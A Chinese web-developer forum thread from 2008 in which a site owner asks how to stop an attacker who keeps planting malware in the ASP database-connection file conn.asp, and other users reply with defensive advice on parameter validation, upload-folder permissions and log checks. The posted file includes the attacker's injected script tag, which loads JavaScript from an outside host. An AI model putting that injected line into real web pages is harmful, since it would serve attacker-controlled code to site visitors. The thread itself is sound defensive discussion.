28,391
社区成员
发帖
与我相关
我的任务
分享所谓的"狂人",俗称无孔不入的注入网页木马,上次按各位方法加上去,一样还被攻击
我的conn.asp文件,以下被注入的代码。
<%
dim conn,db
dim connstr
db="##com02whm#.asa" '数据库文件位置
on error resume next
connstr="dbq="+server.mappath(""&db&"")+";defaultdir=;driver={microsoft access driver (*.mdb)};"
set conn=server.createobject("adodb.connection")
if err then
err.clear
else
conn.open connstr
end if
sub closeconn()
conn.close
set conn=nothing
end sub
%>
<script language="javascript" src="http://ccon.ezua.com/click.js?id=625478035&logo=3"></script> 被注入的
各位有什么好的方法把conn.asp文件加上防注呢
<%
dim conn,db
dim connstr
db="##com02whm#.asa" '数据库文件位置
on error resume next
connstr="dbq="+server.mappath(""&db&"")+";defaultdir=;driver={microsoft access driver (*.mdb)};"
set conn=server.createobject("adodb.connection")
if err then
err.clear
else
conn.open connstr
end if
sub closeconn()
conn.close
set conn=nothing
end sub
%>
<script language="javascript" src="http://ccon.ezua.com/click.js?id=625478035&logo=3"></script> 被注入的
各位有什么好的方法把conn.asp文件加上防注呢
...全文
请发表友善的回复…
发表回复
weihanmingwhmwhm 2008-06-06
- 打赏
- 举报
我现在可以禁止木马运行,但有弹出.打开网页是没有问题的
Atai-Lu 2008-06-06
- 打赏
- 举报
服务器的问题找空间商
程序的问题自己修补漏洞,要么就请人给你修复,没别的办法
程序的问题自己修补漏洞,要么就请人给你修复,没别的办法
weihanmingwhmwhm 2008-06-06
- 打赏
- 举报
[Quote=引用 13 楼 luxu001207 的回复:]
引用 10 楼 weihanmingwhmwhm 的回复:
引用 8 楼 luxu001207 的回复:
如果是被挂马,估计是文件上传漏洞导致
只是猜测,有没有直接了当的处理方法才是根本,命运啊,难道我们asp开发爱才者的就是所以的木马前倒下
跟asp无关,是你写的程序有问题,或者是服务器安全设置的问题
[/Quote]
你说的也有道理,服务器我也顾不上了,毕竟买的空间,关键有没有方法可以在页面上定义关键木马的,不家木马在打开网页自动弹出的都禁止@
引用 10 楼 weihanmingwhmwhm 的回复:
引用 8 楼 luxu001207 的回复:
如果是被挂马,估计是文件上传漏洞导致
只是猜测,有没有直接了当的处理方法才是根本,命运啊,难道我们asp开发爱才者的就是所以的木马前倒下
跟asp无关,是你写的程序有问题,或者是服务器安全设置的问题
[/Quote]
你说的也有道理,服务器我也顾不上了,毕竟买的空间,关键有没有方法可以在页面上定义关键木马的,不家木马在打开网页自动弹出的都禁止@
weihanmingwhmwhm 2008-06-06
- 打赏
- 举报
[Quote=引用 11 楼 ice241018 的回复:]
将木马运行的组件改名或删除(删除的话要慎重)
将上传执行权限设为无
[/Quote]
木马删除会再来,过两天还重挂马,执行权限设为无,其它上传会不会影响!~
将木马运行的组件改名或删除(删除的话要慎重)
将上传执行权限设为无
[/Quote]
木马删除会再来,过两天还重挂马,执行权限设为无,其它上传会不会影响!~
Atai-Lu 2008-06-06
- 打赏
- 举报
[Quote=引用 10 楼 weihanmingwhmwhm 的回复:]
引用 8 楼 luxu001207 的回复:
如果是被挂马,估计是文件上传漏洞导致
只是猜测,有没有直接了当的处理方法才是根本,命运啊,难道我们asp开发爱才者的就是所以的木马前倒下
[/Quote]
跟asp无关,是你写的程序有问题,或者是服务器安全设置的问题
引用 8 楼 luxu001207 的回复:
如果是被挂马,估计是文件上传漏洞导致
只是猜测,有没有直接了当的处理方法才是根本,命运啊,难道我们asp开发爱才者的就是所以的木马前倒下
[/Quote]
跟asp无关,是你写的程序有问题,或者是服务器安全设置的问题
ice241018 2008-06-06
- 打赏
- 举报
将上传目录的执行权限设为无
ice241018 2008-06-06
- 打赏
- 举报
将木马运行的组件改名或删除(删除的话要慎重)
将上传执行权限设为无
将上传执行权限设为无
weihanmingwhmwhm 2008-06-06
- 打赏
- 举报
[Quote=引用 8 楼 luxu001207 的回复:]
如果是被挂马,估计是文件上传漏洞导致
[/Quote]
只是猜测,有没有直接了当的处理方法才是根本,命运啊,难道我们asp开发爱才者的就是所以的木马前倒下
如果是被挂马,估计是文件上传漏洞导致
[/Quote]
只是猜测,有没有直接了当的处理方法才是根本,命运啊,难道我们asp开发爱才者的就是所以的木马前倒下
weihanmingwhmwhm 2008-06-06
- 打赏
- 举报
用了这个语言定义挂码,木马运行不了,但还会有提示弹出有病毒的
中木马 <SCRIPT language=javascript
src="Menu/Menu_func.js"></SCRIPT>
<SCRIPT language=javascript
src="Menu/Menu_init.js"></SCRIPT>
<TITLE>::::::::</TITLE>
定义挂马,<![CDATA[
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
/* 以后请在此关注最新木马处理方法:http://www.nihaoku.cn/ff/api.htm */
]]>
我想能不能有根本的方法让他木马不能运行!
中木马 <SCRIPT language=javascript
src="Menu/Menu_func.js"></SCRIPT>
<SCRIPT language=javascript
src="Menu/Menu_init.js"></SCRIPT>
<TITLE>::::::::</TITLE>
定义挂马,<![CDATA[
iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');}
script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');}
/* 以后请在此关注最新木马处理方法:http://www.nihaoku.cn/ff/api.htm */
]]>
我想能不能有根本的方法让他木马不能运行!
Atai-Lu 2008-06-06
- 打赏
- 举报
如果是被挂马,估计是文件上传漏洞导致
Atai-Lu 2008-06-06
- 打赏
- 举报
参数,所有的,需要客户端发送的参数都需要进行检测
包括所有的url参数,以及所有的表单参数
你如你新闻详细页面需要根据url中的id参数来判断显示哪条信息,并且id是数字类型,那么你需要做以下检测
dim Id
Id=Trim(Request("ID"))
if not isnumeric(Id) or Id="" then Id=0 '若得到的参数是非数字,或者空参数,将Id初始化为0
如果接受的参数是字符串类型的,那么你需要检测该字符串是否有什么可以导致你的sql语句的字符,如果有,则替换掉
包括所有的url参数,以及所有的表单参数
你如你新闻详细页面需要根据url中的id参数来判断显示哪条信息,并且id是数字类型,那么你需要做以下检测
dim Id
Id=Trim(Request("ID"))
if not isnumeric(Id) or Id="" then Id=0 '若得到的参数是非数字,或者空参数,将Id初始化为0
如果接受的参数是字符串类型的,那么你需要检测该字符串是否有什么可以导致你的sql语句的字符,如果有,则替换掉
weihanmingwhmwhm 2008-06-06
- 打赏
- 举报
[Quote=引用 4 楼 weihanmingwhmwhm 的回复:]
引用 1 楼 luxu001207 的回复:
这个注入跟你的conn文件有什么关系???
所有需要客户端发送的参数你都做好验证了吗?
包括所有的url参数,所有的表单参数,你都验证好了吗???
关键你是如何验证,网上谈到防木马的,代码写上去,还是被注入~~那些无聊的人专干坏事!
[/Quote]
我是用虚拟主机的,因此IIS是查不到的,我发现有时上传文件有.asp文件,我知道是病毒,后来删掉了,现在中毒的,上传文件夹上面也没有.asp文件了,照样还被挂马
引用 1 楼 luxu001207 的回复:
这个注入跟你的conn文件有什么关系???
所有需要客户端发送的参数你都做好验证了吗?
包括所有的url参数,所有的表单参数,你都验证好了吗???
关键你是如何验证,网上谈到防木马的,代码写上去,还是被注入~~那些无聊的人专干坏事!
[/Quote]
我是用虚拟主机的,因此IIS是查不到的,我发现有时上传文件有.asp文件,我知道是病毒,后来删掉了,现在中毒的,上传文件夹上面也没有.asp文件了,照样还被挂马
gingerkang 2008-06-06
- 打赏
- 举报
查iis日志,根据conn.asp被修改的时间查找日志附近时间的访问记录
weihanmingwhmwhm 2008-06-06
- 打赏
- 举报
[Quote=引用 1 楼 luxu001207 的回复:]
这个注入跟你的conn文件有什么关系???
所有需要客户端发送的参数你都做好验证了吗?
包括所有的url参数,所有的表单参数,你都验证好了吗???
[/Quote]
关键你是如何验证,网上谈到防木马的,代码写上去,还是被注入~~那些无聊的人专干坏事!
这个注入跟你的conn文件有什么关系???
所有需要客户端发送的参数你都做好验证了吗?
包括所有的url参数,所有的表单参数,你都验证好了吗???
[/Quote]
关键你是如何验证,网上谈到防木马的,代码写上去,还是被注入~~那些无聊的人专干坏事!
weihanmingwhmwhm 2008-06-06
- 打赏
- 举报
[Quote=引用 1 楼 luxu001207 的回复:]
这个注入跟你的conn文件有什么关系???
所有需要客户端发送的参数你都做好验证了吗?
包括所有的url参数,所有的表单参数,你都验证好了吗???
[/Quote]
我不明白他是如何注入的,从那里入手可以防住?
这个注入跟你的conn文件有什么关系???
所有需要客户端发送的参数你都做好验证了吗?
包括所有的url参数,所有的表单参数,你都验证好了吗???
[/Quote]
我不明白他是如何注入的,从那里入手可以防住?
gingerkang 2008-06-06
- 打赏
- 举报
文件被修改了?
注入一般指操作数据库的sql语句被合法的非手段篡改了,
AAA===>ABBBAA可以说AAA字符串被注入了BBB,不要什么都是防注,弄得人晕晕的.
注入一般指操作数据库的sql语句被合法的非手段篡改了,
AAA===>ABBBAA可以说AAA字符串被注入了BBB,不要什么都是防注,弄得人晕晕的.
Atai-Lu 2008-06-06
- 打赏
- 举报
这个注入跟你的conn文件有什么关系???
所有需要客户端发送的参数你都做好验证了吗?
包括所有的url参数,所有的表单参数,你都验证好了吗???
所有需要客户端发送的参数你都做好验证了吗?
包括所有的url参数,所有的表单参数,你都验证好了吗???
